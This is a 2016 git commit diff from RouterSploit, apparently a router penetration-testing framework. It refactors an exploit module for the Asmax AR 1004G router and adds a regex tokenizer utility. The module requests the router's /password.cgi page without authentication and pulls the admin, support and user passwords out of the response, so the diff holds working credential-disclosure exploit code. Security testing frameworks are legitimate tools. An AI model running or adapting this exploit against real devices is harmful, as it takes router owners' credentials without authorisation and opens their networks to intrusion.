Merge branch 'dev'

threat9 · Jul 16, 2016 · 83eb1a6 · 83eb1a6
2 parents e13bfd3 + 206a70c
commit 83eb1a6
Show file tree

Hide file tree

Showing 3 changed files with 39 additions and 16 deletions.
diff --git a/routersploit/__init__.py b/routersploit/__init__.py
@@ -13,6 +13,7 @@
     multi,
     index_modules,
     ssh_interactive,
+    tokenize,
 )
 
 from routersploit import exploits

diff --git a/routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py b/routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
@@ -1,14 +1,12 @@
-import re
-
 from routersploit import (
     exploits,
-    print_status,
     print_error,
     print_success,
     print_table,
     http_request,
     mute,
     validators,
+    tokenize,
 )
 
 
@@ -39,21 +37,19 @@ def run(self):
         creds = []
         url = "{}:{}/password.cgi".format(self.target, self.port)
 
-        response = http_request(method="GET", url=url)
-        if response is None:
+        try:
+            response = http_request(method="GET", url=url).text
+        except AttributeError:
             return
 
-        admin = re.findall("pwdAdmin = '(.+?)'", response.text)
-        if admin:
-            creds.append(('admin', admin[0]))
-
-        support = re.findall("pwdSupport = '(.+?)'", response.text)
-        if support:
-            creds.append(('support', support[0]))
+        tokens = [
+            ("Admin", r"pwdAdmin = '(.+?)'"),
+            ("Support", r"pwdSupport = '(.+?)'"),
+            ("User", r"pwdUser = '(.+?)'")
+        ]
 
-        user = re.findall("pwdUser = '(.+?)'", response.text)
-        if user:
-            creds.append(('user', user[0]))
+        for token in tokenize(tokens, response):
+            creds.append((token.typ, token.value[-1]))
 
         if creds:
             print_success("Credentials found!")

diff --git a/routersploit/utils.py b/routersploit/utils.py
@@ -4,9 +4,10 @@
 import threading
 import os
 import sys
+import re
+import collections
 import random
 import string
-import socket
 import importlib
 import select
 import socket
@@ -507,3 +508,28 @@ def writeall(sock):
             chan.send(d)
     except:
         pass
+
+
+def tokenize(token_specification, text):
+    Token = collections.namedtuple('Token', ['typ', 'value', 'line', 'column', 'mo'])
+
+    token_specification.extend((
+        ('NEWLINE', r'\n'),          # Line endings
+        ('SKIP', r'.'),              # Any other character
+    ))
+
+    tok_regex = '|'.join('(?P<%s>%s)' % pair for pair in token_specification)
+    line_num = 1
+    line_start = 0
+    for mo in re.finditer(tok_regex, text):
+        kind = mo.lastgroup
+        value = filter(lambda x: x is not None, mo.groups())
+        if kind == 'NEWLINE':
+            line_start = mo.end()
+            line_num += 1
+        elif kind == 'SKIP':
+            pass
+        else:
+            column = mo.start() - line_start
+            yield Token(kind, value, line_num, column, mo)
+